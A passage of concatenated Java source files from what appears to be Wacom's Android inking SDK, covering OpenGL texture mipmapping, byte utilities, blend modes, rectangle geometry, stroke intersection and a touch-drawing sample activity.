GLES20.GL_TEXTURE_WRAP_T, wrapMode); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_MAG_FILTER, sampleMode); GLES20.glTexParameteri(GLES20.GL_TEXTURE_2D, GLES20.GL_TEXTURE_MIN_FILTER, GLES20.GL_LINEAR_MIPMAP_LINEAR); Bitmap bitmap = null; Bitmap baseBitmap = null; boolean bMipmapping = true; int level = 0; int size = 0; while (bMipmapping) { String f = null; try { if (level==0){ f = filename; } else { f = fn + "_" + level + "." + ext; } // is = context.getAssets().open(f); is = Utils.openFile(context, f, location); bitmap = BitmapFactory.decodeStream(is); if (bitmap != null) { baseBitmap = bitmap; size = baseBitmap.getWidth(); } } catch (IOException e) { if (Logger.LOG_ENABLED) logger.i("generateMipmaps / error opening asset " + f); bitmap = null; } finally { try { is.close(); } catch (Exception e) { } } if (bitmap==null){ size = size / 2; if (Logger.LOG_ENABLED) logger.i("generateMipmaps / no bitmap allocated for " + filename + ", level=" + level + "; downscaling initial bitmap to " + size + "x" + size); bitmap = Bitmap.createScaledBitmap(baseBitmap, size, size, true); if (bitmap==baseBitmap){ //if this ever happens, it seems like android sdk bug (1); maybe we should throw an exception here if (Logger.LOG_ENABLED) logger.i("generateMipmaps / if this ever happens, it seems like android sdk bug (1); maybe we should throw an exception here"); return false; } if (bitmap==null){ //if this ever happens, it seems like android sdk bug (2); maybe we should throw an exception here if (Logger.LOG_ENABLED) logger.i("generateMipmaps / if this ever happens, it seems like android sdk bug (2); maybe we should throw an exception here"); return false; } } if (Logger.LOG_ENABLED) logger.i("generateMipmaps / texImage2D => fn=" + filename + " level=" + level + " / size=" + bitmap.getWidth() + "x" + bitmap.getHeight()); GLUtils.texImage2D(GLES20.GL_TEXTURE_2D, level, bitmap, 0); errCode = GLES20.glGetError(); if (errCode!=GLES20.GL_NO_ERROR){ if (Logger.LOG_ENABLED) logger.e("generateMipmaps / ERROR " + errCode+ " with texImage2D => fn=" + filename + " level=" + level); } if (level>0){ bitmap = Utils.recycleBitmap(bitmap); } level++; bMipmapping = size>1; } Utils.recycleBitmap(baseBitmap); return true; } public static void checkError(String errorMessageOpt){ EGL10 egl = (EGL10)EGLContext.getEGL(); int e = GLES20.glGetError(); if (e!=GLES20.GL_NO_ERROR){ if (Logger.LOG_ENABLED) logger.e("OpenGL error" + (errorMessageOpt!=null?(" ("+errorMessageOpt+")"):"") + ": " + e); } e = egl.eglGetError(); if (e!=EGL10.EGL_SUCCESS){ if (Logger.LOG_ENABLED) logger.e("EGL error" + (errorMessageOpt!=null?(" ("+errorMessageOpt+")"):"") + ": " + e); } } public static String getGPUInfo(){ String info = ""; info += "GPUINFO <start>"; info += "GPUINFO | vendor: " + GLES20.glGetString(GLES20.GL_VENDOR) + "\n"; info += "GPUINFO | renderer: " + GLES20.glGetString(GLES20.GL_RENDERER) + "\n"; info += "GPUINFO | verison: " + GLES20.glGetString(GLES20.GL_VERSION) + "\n"; info += "GPUINFO | extensions: " + GLES20.glGetString(GLES20.GL_EXTENSIONS) + "\n"; info += "GPUINFO <end>"; return info; } public static int getFramebufferBinding(){ // glGetIntegerv(GL_FRAMEBUFFER_BINDING, &defaultFBO); int params[] = new int[1]; GLES20.glGetIntegerv(GLES20.GL_FRAMEBUFFER_BINDING, params, 0); //return params[0]; return 0; } }<file_sep>package com.wacom.ink.utils; public class SharedResource<T> { private T resource; private Owner<T> owner; public SharedResource(T resource){ this.resource = resource; } public void set(T resource){ this.resource = resource; } public T aquire(SharedResource.Owner<T> owner){ if (this.owner!=null && this.owner!=owner){ this.owner.release(resource); } this.owner = owner; // owner.onAquired(); return resource; } // public void release(){ // if (owner!=null){ // owner.release(); // } // } public void release() { if (owner!=null){ owner.release(resource); owner = null; } } public static interface Owner<T>{ void release(T resource); // void onAquired(); } public boolean hasOwner() { return owner!=null; } } <file_sep>package com.wacom.ink.utils; import java.io.IOException; import java.io.InputStream; public class BitUtils { public static boolean compare(byte[] arr1, byte[] arr2){ if (arr1==null || arr2==null){ return false; } else if (arr1.length!=arr2.length){ return false; } else { for (int i=0;i<arr1.length;i++){ if (arr1[i]!=arr2[i]){ return false; } } } return true; } public static int uint32LittleEndian(int value) { value = (int)((long)value & 0xFFFFFFFF); return swapBytes(value); } public static short swapBytes(short value) { int b1 = value & 0xff; int b2 = (value >> 8) & 0xff; return (short) (b1 << 8 | b2 << 0); } public static int swapBytes(int value) { int b1 = (value >> 0) & 0xff; int b2 = (value >> 8) & 0xff; int b3 = (value >> 16) & 0xff; int b4 = (value >> 24) & 0xff; return b1 << 24 | b2 << 16 | b3 << 8 | b4 << 0; } public static long swapBytes(long value) { long b1 = (value >> 0) & 0xff; long b2 = (value >> 8) & 0xff; long b3 = (value >> 16) & 0xff; long b4 = (value >> 24) & 0xff; long b5 = (value >> 32) & 0xff; long b6 = (value >> 40) & 0xff; long b7 = (value >> 48) & 0xff; long b8 = (value >> 56) & 0xff; return b1 << 56 | b2 << 48 | b3 << 40 | b4 << 32 | b5 << 24 | b6 << 16 | b7 << 8 | b8 << 0; } public static boolean findBytePattern(byte[] pattern, InputStream in) throws IOException { int read = -1; int index = 0; do { if (index == pattern.length) { return true; } read = in.read(); if (read == pattern[index]) { index++; } else { index = 0; } } while(read != -1); return false; } } <file_sep>package com.wacom.ink.utils; import java.io.IOException; import java.io.OutputStream; import java.nio.ByteBuffer; public class ByteBufferOutputStream extends OutputStream { private ByteBuffer buffer; public ByteBufferOutputStream(ByteBuffer byteBuffer) throws IOException { if (byteBuffer == null) throw new IOException("Invalid ByteBuffer"); this.buffer = byteBuffer; } @Override public void write(int oneByte) throws IOException { buffer.put((byte) oneByte); } @Override public void write(byte[] buffer, int offset, int count) throws IOException { this.buffer.put(buffer, offset, count); } }<file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.rasterization; /** * Blend modes enumeration. */ public enum BlendMode { /** * Normal blending. */ BLENDMODE_NORMAL((byte)0), /** * Reverse blending. */ BLENDMODE_NORMAL_REVERSE((byte)1), /** * "Zero" blending (erase). */ BLENDMODE_ERASE((byte)2), /** * No blending (overwrite). */ BLENDMODE_NONE((byte)3), /** * Max blending. */ BLENDMODE_MAX((byte)4), /** * Min blending. */ BLENDMODE_MIN((byte)5), /** * Multiply blending. Multiplies alpha and color components. */ BLENDMODE_MULTIPLY((byte)6), BLENDMODE_ADD((byte)7), BLENDMODE_SUBSTRACT((byte)8), BLENDMODE_SUBSTRACT_REVERSE((byte)9), /** * Multiply blending. Multiplies only color components. */ BLENDMODE_MULTIPLY_NO_ALPHA((byte)10), BLENDMODE_MULTIPLY_NO_ALPHA_INVERT((byte)11); byte value; BlendMode(byte value){ this.value = value; } public byte getValue(){ return value; } @Override public String toString() { BlendMode blend = this; if (blend==BLENDMODE_NORMAL){ return STR_BLENDMODE_NORMAL; } else if (blend==BLENDMODE_NORMAL_REVERSE){ return STR_BLENDMODE_NORMAL_REVERSE; } else if (blend==BLENDMODE_ERASE){ return STR_BLENDMODE_ERASE; } else if (blend==BLENDMODE_MAX){ return STR_BLENDMODE_MAX; } else if (blend==BLENDMODE_MIN){ return STR_BLENDMODE_MIN; } else if (blend==BLENDMODE_MULTIPLY){ return STR_BLENDMODE_MULTIPLY; } else if (blend==BLENDMODE_ADD){ return STR_BLENDMODE_ADD; } else if (blend==BLENDMODE_SUBSTRACT){ return STR_BLENDMODE_SUBSTRACT; } else if (blend==BLENDMODE_SUBSTRACT_REVERSE){ return STR_BLENDMODE_SUBSTRACT_REVERSE; } else if (blend==BLENDMODE_MULTIPLY_NO_ALPHA){ return STR_BLENDMODE_MULTIPLY_NO_ALPHA; } else if (blend==BLENDMODE_MULTIPLY_NO_ALPHA_INVERT){ return STR_BLENDMODE_MULTIPLY_NO_ALPHA_INVERT; } return STR_BLENDMODE_NONE; } public static final String STR_BLENDMODE_NORMAL = "NORMAL"; public static final String STR_BLENDMODE_NORMAL_REVERSE = "NORMAL_REVERSE"; public static final String STR_BLENDMODE_ERASE = "ERASE"; public static final String STR_BLENDMODE_NONE = "NONE"; public static final String STR_BLENDMODE_MAX = "MAX"; public static final String STR_BLENDMODE_MIN = "MIN"; public static final String STR_BLENDMODE_MULTIPLY = "MULTIPLY"; public static final String STR_BLENDMODE_ADD = "ADD"; public static final String STR_BLENDMODE_SUBSTRACT = "SUBSTRACT"; public static final String STR_BLENDMODE_SUBSTRACT_REVERSE = "SUBSTRACT_REVERSE"; public static final String STR_BLENDMODE_MULTIPLY_NO_ALPHA = "MULTIPLY_NO_ALPHA"; public static final String STR_BLENDMODE_MULTIPLY_NO_ALPHA_INVERT = "MULTIPLY_NO_ALPHA_INVERT"; public static BlendMode getFromString(String blendModeAsString){ if (blendModeAsString.equals("NORMAL")) { return BLENDMODE_NORMAL; } else if (blendModeAsString.equals("NORMAL_REVERSE")) { return BLENDMODE_NORMAL_REVERSE; } else if (blendModeAsString.equals("ERASE")) { return BLENDMODE_ERASE; } else if (blendModeAsString.equals("MAX")) { return BLENDMODE_MAX; } else if (blendModeAsString.equals("MIN")) { return BLENDMODE_MIN; } else if (blendModeAsString.equals("MULTIPLY")) { return BLENDMODE_MULTIPLY; } return BLENDMODE_NONE; } } <file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.geometry; public class WRect { /** * @hide */ public long handle; private native long nativeInitialize(); private native void nativeFinalize(long handle); private native float nativeGetX(long handle); private native float nativeGetY(long handle); private native float nativeGetW(long handle); private native float nativeGetH(long handle); private native void nativeSetX(long handle, float value); private native void nativeSetY(long handle, float value); private native void nativeSetW(long handle, float value); private native void nativeSetH(long handle, float value); public WRect() { this(Float.NaN, Float.NaN, Float.NaN, Float.NaN); } public WRect(float w, float h){ this(0, 0, w, h); } public WRect(WRect rect) { handle = nativeInitialize(); set(rect); } public WRect(float x, float y, float w, float h) { handle = nativeInitialize(); set(x, y, w, h); } public float getX(){ return nativeGetX(handle); } public float getY(){ return nativeGetY(handle); } public float getWidth(){ return nativeGetW(handle); } public float getHeight(){ return nativeGetH(handle); } public void setX(float value){ nativeSetX(handle, value); } public void setY(float value){ nativeSetY(handle, value); } public void setWidth(float value){ nativeSetW(handle, value); } public void setHeight(float value){ nativeSetH(handle, value); } public boolean isNaN(){ return Float.isNaN(getX()) || Float.isNaN(getY()) || Float.isNaN(getWidth()) || Float.isNaN(getHeight()); } public void setNaN(){ set(Float.NaN, Float.NaN, Float.NaN, Float.NaN); } public void copy(WRect rect){ set(rect.getX(), rect.getY(), rect.getWidth(), rect.getHeight()); } public void union(WRect rect){ if (isNaN()){ if (!rect.isNaN()){ set(rect.getX(), rect.getY(), rect.getWidth(), rect.getHeight()); } return; } if (rect.isNaN()){ return; } float nx1 = Math.min(getX(), rect.getX()); float ny1 = Math.min(getY(), rect.getY()); float nx2 = Math.max(getX()+getWidth(), rect.getX()+rect.getWidth()); float ny2 = Math.max(getY()+getHeight(), rect.getY()+rect.getHeight()); set(nx1, ny1, nx2-nx1, ny2-ny1); } public boolean intersect(WRect rect) { if (rect.isNaN()) { setNaN(); return true; } return intersect(rect.getX(), rect.getY(), rect.getWidth(), rect.getHeight()); } public boolean intersect(float x, float y, float width, float height) { if (!isNaN()){ float[] curr = new float[]{getX(), getY(), getWidth(), getHeight()}; if (curr[0] < x + width && x < curr[0] + curr[2] && curr[1] < y + height && y < curr[1] + curr[3]) { float nx1 = Math.max(curr[0], x); float ny1 = Math.max(curr[1], y); float nx2 = Math.min(curr[0] + curr[2], x + width); float ny2 = Math.min(curr[1] + curr[3], y + height); set(nx1, ny1, nx2-nx1, ny2-ny1); return true; } } return false; } public void roundOut() { float nx = (float) Math.floor(getX()); float ny = (float) Math.floor(getY()); float nw = (float) Math.ceil(getWidth()); float nh = (float) Math.ceil(getHeight()); set(nx, ny, nw, nh); } public void set(WRect rect) { set(rect.getX(), rect.getY(), rect.getWidth(), rect.getHeight()); } public void set(float x, float y, float w, float h){ setX(x); setY(y); setWidth(w); setHeight(h); } @Override public String toString() { return "[" + getX() + "," + getY() + "; " + getWidth() + "," + getHeight() + "]"; } @Override protected void finalize() throws Throwable { super.finalize(); nativeFinalize(handle); } static { System.loadLibrary("InkingEngine"); } } <file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.utils; import android.content.Intent; import android.util.SparseArray; /** * A simple Android Intent manager. This class is designed to work with IntentResponseHandler implementations. * */ public class IntentManager{ private SparseArray<IntentResponseHandler> handlers; public IntentManager(){ handlers = new SparseArray<IntentResponseHandler>(); } public IntentResponseHandler getIntentResponseHandler(int requestCode){ return handlers.get(requestCode); } public void addIntentResponseHandler(int requestCode, IntentResponseHandler handler){ handlers.put(requestCode, handler); } public boolean processIntentResponse(int requestCode, int resultCode, Intent data){ IntentResponseHandler handler = getIntentResponseHandler(requestCode); if (handler!=null){ return handler.handleResponse(resultCode, data); } return false; } }<file_sep>/** * Group of classes designed implementing data smoothing (Smoothing module) */ package com.wacom.ink.smooth; <file_sep>package com.wacom.ink.samples.drawwithtouch; import java.nio.FloatBuffer; import com.pinaround.R; import android.app.Activity; import android.graphics.Color; import android.os.Bundle; import android.view.MotionEvent; import android.view.SurfaceHolder; import android.view.SurfaceView; import android.view.View; import android.view.View.OnTouchListener; import android.widget.Button; import com.wacom.ink.geometry.WRect; import com.wacom.ink.path.PathBuilder.PropertyFunction; import com.wacom.ink.path.PathBuilder.PropertyName; import com.wacom.ink.path.SpeedPathBuilder; import com.wacom.ink.rasterization.BlendMode; import com.wacom.ink.rasterization.InkCanvas; import com.wacom.ink.rasterization.Layer; import com.wacom.ink.rasterization.ParticleBrush; import com.wacom.ink.rasterization.SolidColorBrush; import com.wacom.ink.rasterization.StrokeJoin; import com.wacom.ink.rasterization.StrokePaint; import com.wacom.ink.rendering.RenderingContext; import com.wacom.ink.smooth.MultiChannelSmoothener; import com.wacom.ink.smooth.MultiChannelSmoothener.SmoothingResult; import com.wacom.ink.utils.TouchUtils; public class DrawWithTouchPart05 extends Activity { private RenderingContext renderingContext; private InkCanvas inkCanvas; private Layer viewLayer; private SpeedPathBuilder pathBuilder; private StrokePaint paint; private StrokePaint prelimPaint; private SolidColorBrush brush; private StrokeJoin strokeJoin; private StrokeJoin prelimJoin; private Layer strokesLayer; private Layer strokesWithPreliminaryLayer; private MultiChannelSmoothener smoothener; private int pathStride; private WRect prevPrelimArea = new WRect(); private WRect dirtyArea = new WRect(); public void changeColor(View v) { paint.setColor(Color.RED); } @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_draw_with_touch); /*Button btnColore = (Button) findViewById(R.id.btnColore); btnColore.setOnClickListener ( new OnClickListener() { @Override public void onClick(View v) { } } );*/ SurfaceView surfaceView = (SurfaceView) findViewById(R.id.surfaceview); surfaceView.getHolder().addCallback(new SurfaceHolder.Callback(){ @Override public void surfaceChanged(SurfaceHolder holder, int format, int width, int height) { renderingContext = new RenderingContext(new RenderingContext.EGLConfigSpecification()); renderingContext.initContext(); renderingContext.createEGLSurface(holder); renderingContext.bindEGLContext(); inkCanvas = new InkCanvas(); inkCanvas.setDimensions(width, height); inkCanvas.glInit(); viewLayer = new Layer(); // Initialize the view layer with the dimensions of the surface, with scale factor 1.0 and // bind it to the default framebuffer, the OpenGL context was created with. viewLayer.initWithFramebuffer(inkCanvas, width, height, 1.0f, 0); viewLayer.setFlipY(true); strokesLayer = new Layer(); strokesLayer.init(inkCanvas, width, height, 1.0f, true); strokesWithPreliminaryLayer = new Layer(); strokesWithPreliminaryLayer.init(inkCanvas, width, height, 1.0f, true); pathBuilder = new SpeedPathBuilder(getResources().getDisplayMetrics().density); pathBuilder.setNormalizationConfig(500.0f, 4000.0f); pathBuilder.setMovementThreshold(2.0f); pathBuilder.setPropertyConfig(PropertyName.Width, 6f, 12f, 6f, 12f, PropertyFunction.Power, 1.0f, false); pathBuilder.setPropertyConfig(PropertyName.Alpha, 0.05f, 0.4f, 0.05f, 0.4f, PropertyFunction.Power, 1.0f, false); pathStride = pathBuilder.getStride(); /*brush = new ParticleBrush(true); brush.setBlendMode(BlendMode.BLENDMODE_NORMAL); brush.setFillTextureFilename("fill.png"); brush.setShapeTextureFilename("shape.png"); brush.setScattering(0.15f); brush.setSpacing(0.15f); brush.setRotateRandom(true); brush.setRotateAlongTrajectory(false); brush.allocateTextures(DrawWithTouchPart05.this);*/ brush = new SolidColorBrush(); paint = new StrokePaint(); paint.setStrokeBrush(brush); // Particle brush. paint.setColor(Color.BLUE); // Blue color. paint.setWidth(Float.NaN); // Expected variable width. paint.setAlpha(Float.NaN); // Expected variable alpha. prelimPaint = new StrokePaint(); strokeJoin = new StrokeJoin(); prelimJoin = new StrokeJoin(); smoothener = new MultiChannelSmoothener(pathStride); smoothener.enableChannel(2); smoothener.enableChannel(3); renderView(); } @Override public void surfaceCreated(SurfaceHolder holder) { } @Override public void surfaceDestroyed(SurfaceHolder holder) { } }); surfaceView.setOnTouchListener(new OnTouchListener() { @Override public boolean onTouch(View v, MotionEvent event) { buildPath(event); drawStroke(event); renderView(); return true; } }); } private void renderView() { inkCanvas.setTarget(viewLayer); // Clear the view and fills it with white color. inkCanvas.clearColor(Color.WHITE); inkCanvas.drawLayer(strokesWithPreliminaryLayer, BlendMode.BLENDMODE_NORMAL); renderingContext.swap(); } private void buildPath(MotionEvent event){ float x = event.getX(); float y = event.getY(); double timestamp = TouchUtils.getTimestamp(event); FloatBuffer part = null; int partSize; boolean bFinishSmoothing = false; // Add the current input point to the path builder switch (event.getAction()){ case MotionEvent.ACTION_DOWN: part = pathBuilder.beginPath(x, y, timestamp); smoothener.reset(); break; case MotionEvent.ACTION_MOVE: part = pathBuilder.addPoint(x, y, timestamp); break; case MotionEvent.ACTION_UP: bFinishSmoothing = true; part = pathBuilder.endPath(x, y, timestamp); break; } SmoothingResult smoothingResult; if (part!=null){ partSize = pathBuilder.getPathPartSize(); // Smoothen the returned control points (aka path part). smoothingResult = smoothener.smooth(part, partSize, bFinishSmoothing); // Add the smoothed control points to the path builder. pathBuilder.addPathPart(smoothingResult.getSmoothedPoints(), smoothingResult.getSize()); } // Create a preliminary path. FloatBuffer preliminaryPath = pathBuilder.createPreliminaryPath(); // Smooth the preliminary path's control points (return inform of a path part). smoothingResult = smoothener.smooth(preliminaryPath, pathBuilder.getPreliminaryPathSize(), true); // Add the smoothed preliminary path to the path builder. pathBuilder.finishPreliminaryPath(smoothingResult.getSmoothedPoints(), smoothingResult.getSize()); } private void drawStroke(MotionEvent event){ switch (event.getAction()){ case MotionEvent.ACTION_DOWN: strokeJoin.reset(); // Reset areas, needed for correct drawing. prevPrelimArea.setNaN(); dirtyArea.setNaN(); // Use the same paint for the preliminary path. prelimPaint.copy(paint); prelimPaint.setRoundCaps(false, true); // Copy the strokesLayer content into the strokesWithPreliminaryLayer. inkCanvas.setTarget(strokesWithPreliminaryLayer); inkCanvas.drawLayer(strokesLayer, null, BlendMode.BLENDMODE_NONE); case MotionEvent.ACTION_MOVE: case MotionEvent.ACTION_UP: if (pathBuilder.getPathSize()>0){ if (pathBuilder.hasFinished()){ paint.setRoundCaps(false, true); } else { if (pathBuilder.getPathSize()==pathBuilder.getAddedPointsSize()){ paint.setRoundCaps(true, false); } else { paint.setRoundCaps(false, false); } } // Draw part of a path. if (pathBuilder.getAddedPointsSize() > 0) { inkCanvas.setTarget(strokesLayer); inkCanvas.drawStroke(paint, strokeJoin, pathBuilder.getPathBuffer(), pathBuilder.getPathLastUpdatePosition(), pathBuilder.getAddedPointsSize(), pathStride, 0.0f, 1.0f); // Set the dirty area of the current update and unite it with // the previous preliminary path dirty area (if any). dirtyArea.set(strokeJoin.getDirtyArea()); dirtyArea.union(prevPrelimArea); } inkCanvas.setTarget(strokesWithPreliminaryLayer); // Update only the dirty area. inkCanvas.setClipRect(dirtyArea); inkCanvas.drawLayer(strokesLayer, null, BlendMode.BLENDMODE_NONE); inkCanvas.disableClipRect(); prelimJoin.copy(strokeJoin); // Draw the preliminary path. inkCanvas.drawStroke(prelimPaint, prelimJoin, pathBuilder.getPreliminaryPathBuffer(), 0, pathBuilder.getFinishedPreliminaryPathSize(), pathBuilder.getStride(), 0.0f, 1.0f); // Save the preliminary path's dirty area (if any). prevPrelimArea.set(prelimJoin.getDirtyArea()); } break; } } } <file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.manipulation; import java.nio.ByteBuffer; import java.nio.ByteOrder; import java.nio.FloatBuffer; import java.nio.IntBuffer; import java.util.Iterator; import android.graphics.RectF; import com.wacom.ink.utils.Logger; /** * This class is specialized in calculation of intersections between an {@link com.wacom.ink.manipulation.Intersectable Intersectable} instance and a target. * Therefore stroke models, which should be intersectable, sould implement the Intersectable interface.<br/> * A target could be a path, or an area enclosed by a path. * The class will calculate a list of intervals, covering the whole stroke. * They will start from the beginning of the stroke and finish at the end of it. * Every interval will be either entirely inside the target or entirely outside of the stroke. * The class could be also used to for fast checking if the stroke and target are intersecting at all, without calculating the intervals. * * @param <E> extends {@link com.wacom.ink.manipulation.Intersectable Intersectable} */ public class Intersector<E extends Intersectable> { private final static Logger logger = new Logger(Intersector.class); private final static int TARGET_NONE = 0; private final static int TARGET_AS_STROKE = 1; private final static int TARGET_AS_CLOSED_PATH = 2; private int currentTarget; /** * @hide */ public long handle; private IntersectionResult intersection; /** * Constructs an Intersector instance. */ public Intersector() { handle = nativeInitialize(); currentTarget = TARGET_NONE; intersection = new IntersectionResult(); } private void setIntervalsResult(ByteBuffer indices, ByteBuffer values, ByteBuffer inside) { if (Logger.LOG_ENABLED) logger.i("called from JNI(1) / setIntervalsResult | " + indices.limit() + "," + indices.limit() + "," + inside.limit()); intersection.iterator.indices = indices.order(ByteOrder.nativeOrder()).asIntBuffer(); intersection.iterator.values = values.order(ByteOrder.nativeOrder()).asFloatBuffer(); intersection.iterator.inside = inside; if (Logger.LOG_ENABLED) logger.i("called from JNI(2) / setIntervalsResult | " + intersection.iterator.indices.limit() + "," + intersection.iterator.values.limit() + "," + inside.limit()); } private native long nativeInitialize(); private static native void nativeClassInitialize(); private static native void nativeCalculateSegmentBounds(FloatBuffer points, int pointsStride, float width, int index, float scattering, FloatBuffer segmentBoundsBuf); /** * This method calculates the bounds of a segment of the specified path. * @param points The control points for the path. * @param pointsStride Defines the offset from one control point to the next. * @param width The width of the path. If the control points include a width property value, this parameter should be NAN. * @param index The index of the segment. * @param scattering * @param segmentBoundsRect An optional RectF instance, where the result will be stored. If this parameter is null, a new RectF instance is created and returned. * @return The bounds of the segment. */ public static RectF calculateSegmentBounds(FloatBuffer points, int pointsStride, float width, int index, float scattering, RectF segmentBoundsRect){ if (segmentBoundsRect==null){ segmentBoundsRect = new RectF(); } FloatBuffer segmentBounds = com.wacom.ink.utils.Utils.createNativeFloatBuffer(4); nativeCalculateSegmentBounds(points, pointsStride, width, index, scattering, segmentBounds); segmentBounds.position(0); segmentBoundsRect.left = segmentBounds.get(); segmentBoundsRect.top = segmentBounds.get(); segmentBoundsRect.right = segmentBoundsRect.left + segmentBounds.get(); segmentBoundsRect.bottom = segmentBoundsRect.top + segmentBounds.get(); return segmentBoundsRect; } /** * This method calculates the bounds of a single segment of a path. A segment is the curve between two control points. * @param points The control points for the path. * @param pointsStride Defines the offset from one control point to the next. * @param width The width of the path. If the control points include a width property value, this parameter should be NAN. * @param index The index of the segment. * @param scattering This parameter will increase the width of each point. A value of 1 will double the with. Value of 0 is the default value. Values greater than 0 are used for paths rendered with a particle brushes. * @return The bounds of the segment. */ public static RectF calculateSegmentBounds(FloatBuffer points, int pointsStride, float width, int index, float scattering){ return calculateSegmentBounds(points, pointsStride, width, index, scattering, null); } private native void nativeFinalize(long handle); @Override protected void finalize() throws Throwable { try { nativeFinalize(handle); } finally { super.finalize(); } } static { System.loadLibrary("InkingEngine"); nativeClassInitialize(); } /** * The Interval class specifies an interval of a path. Each interval has a fromIndex and an endIndex, defining the * the indices of the path points, the current interval starts from, and ends from, respectively. Each instance can be either inside or * outside the target of the intersection. */ public static class Interval { /** * The index of the segments's starting point inside the path. */ public int fromIndex; /** * The index of the segments's ending point inside the path. */ public int toIndex; /** * The starting value for the Catmull-Rom spline parameter (1 is the default value). */ public float fromValue; /** * The ending value for the Catmull-Rom spline parameter (1 is the default value). */ public float toValue; /** * Each instance can be either inside or outside the target of the intersection. This parameter holds this information as a boolean flag. */ public boolean inside; } /** * An iterator for intervals. */ public static class IntervalIterator implements Iterator<Interval> { private IntBuffer indices; private FloatBuffer values; private ByteBuffer inside; private int size; private int stride; private Interval interval = new Interval(); public void reset(int size, int stride) { if (indices!=null){ indices.position(0); } if (values!=null){ values.position(0); } if (inside!=null){ inside.position(0); } this.size = size; this.stride = stride; } @Override public boolean hasNext() { return indices.position() < size-1; } @Override public Interval next() { interval.fromIndex = indices.get() * stride; interval.fromValue = values.get(); interval.toIndex = indices.get() * stride; interval.toValue = values.get(); interval.inside = inside.get()!=(byte)0x00; return interval; } @Override public void remove() { } } /** * This class is designed to represent the result of an intersection operation. It holds the number of the intervals produced by the intersection and * an {@link com.wacom.ink.manipulation.Intersector.IntervalIterator IntervalIterator} allowing the programmer to traverse the computed intervals. */ public static class IntersectionResult { private IntervalIterator iterator; private int intervalsSize; public IntersectionResult(){ iterator = new IntervalIterator(); } public void reset() { this.intervalsSize = 0; iterator.reset(0, 0); } public void reset(int intervalsSize, int stride) { this.intervalsSize = intervalsSize; iterator.reset(intervalsSize, stride); } /** * This method returns the count of the intervals contained in the current IntersectionResult instance. * @return count of intervals */ public int getCount(){ return intervalsSize/2; } /** * This method returns an {@link com.wacom.ink.manipulation.Intersector.IntervalIterator IntervalIterator} with intervals, * computed by the intersection operation. * @return an iterator with intervals */ public IntervalIterator getIterator(){ return iterator; } } /** * This method sets a stroke as target of the intersection. This method assumes that the control points of the path, defining a stroke, include a width property value. * @param points The control points for the path. * @param position The position in float buffer of the first value of the path. * @param size The size of the path. The size of the path is the number of float values inside the float buffer. * @param stride Defines the offset from one control point to the next. */ public void setTargetAsStroke(FloatBuffer points, int position, int size, int stride){ setTargetAsStroke(points, position, size, stride, Float.NaN); } private native void nativeSetTargetAsStroke(long handle, FloatBuffer points, int position, int size, int pointsStride, float width); /** * This method sets a stroke as a target of the intersection. * @param points The control points for the path. * @param position The position in float buffer of the first value of the path. * @param size The size of the path. The size of the path is the number of float values inside the float buffer. * @param stride Defines the offset from one control point to the next. * @param width The width of the path. If the control points include a width property value, this parameter should be NAN. */ public void setTargetAsStroke(FloatBuffer points, int position, int size, int stride, float width){ if (size>=stride*4) { currentTarget = TARGET_AS_STROKE; nativeSetTargetAsStroke(handle, points, position, size, stride, width); } else { currentTarget = TARGET_NONE; } } private native void nativeSetTargetAsClosedPath(long handle, FloatBuffer points, int position, int size, int stride); /** * This method sets an area enclosed by a path as a target of the intersection. * @param points The control points for the path. * @param position The position in float buffer of the first value of the path. * @param size The size of the path. The size of the path is the number of float values inside the float buffer. * @param stride Defines the offset from one control point to the next. */ public void setTargetAsClosedPath(FloatBuffer points, int position, int size, int stride){ if (size>=stride*4) { currentTarget = TARGET_AS_CLOSED_PATH; nativeSetTargetAsClosedPath(handle, points, position, size, stride); } else { currentTarget = TARGET_NONE; } } private native void nativeIntersectWithTarget(long handle, FloatBuffer points, int size, int pointsStride, float width, float ts, float tf, float strokeBoundsX, float strokeBoundsY, float strokeBoundsW, float strokeBoundsH, FloatBuffer segmentsBounds); /** * This method intersects an {@link com.wacom.ink.manipulation.Intersectable Intersectable} instance with the specified target. * @param intersectableStroke A stroke implementing the Intersectable interface. * @return The result of the intersection. It is important to note, that for performance reasons, each Intersector instance will return the same IntersectionResult each time this method is called. */ public IntersectionResult intersectWithTarget(E intersectableStroke){ //Some error handling if (currentTarget==TARGET_NONE){ intersection.reset(); return intersection; } nativeIntersectWithTarget(handle, intersectableStroke.getPoints(), intersectableStroke.getSize(), intersectableStroke.getStride(), intersectableStroke.getWidth(), intersectableStroke.getStartValue(), intersectableStroke.getEndValue(), intersectableStroke.getBounds().left, intersectableStroke.getBounds().top, intersectableStroke.getBounds().width(), intersectableStroke.getBounds().height(), intersectableStroke.getSegmentsBounds()); intersection.reset(getIntervalsSize(), intersectableStroke.getStride()); return intersection; } private native boolean nativeIsIntersectingTarget(long handle, FloatBuffer points, int size, int pointsStride, float width, float ts, float tf, float strokeBoundsX, float strokeBoundsY, float strokeBoundsW, float strokeBoundsH, FloatBuffer segmentsBounds); /** * This method checks if a {@link com.wacom.ink.manipulation.Intersectable Intersectable} intersects with the specified target. No intervals calculation is being performed. * @param intersectableStroke A stroke implementing the Intersectable interface. * @return True if the stroke is inside the target, false otherwise. */ public boolean isIntersectingTarget(E intersectableStroke){ return nativeIsIntersectingTarget(handle, intersectableStroke.getPoints(), intersectableStroke.getSize(), intersectableStroke.getStride(), intersectableStroke.getWidth(), intersectableStroke.getStartValue(), intersectableStroke.getEndValue(), intersectableStroke.getBounds().left, intersectableStroke.getBounds().top, intersectableStroke.getBounds().width(), intersectableStroke.getBounds().height(), intersectableStroke.getSegmentsBounds()); } private native int nativeGetIntervalsSize(long handle); private int getIntervalsSize(){ return nativeGetIntervalsSize(handle); } } <file_sep>package com.wacom.ink.trial; public class Trial { @SuppressWarnings("unused") private static final String EXPIRATION = "1429747200"; @SuppressWarnings("unused") private static final String SIGNATURE = "<KEY>; }<file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.path; import java.nio.FloatBuffer; /** * The SpeedPathBuilder class is a specialized PathBuilder designed for building of paths from velocity based user input. * */ public class 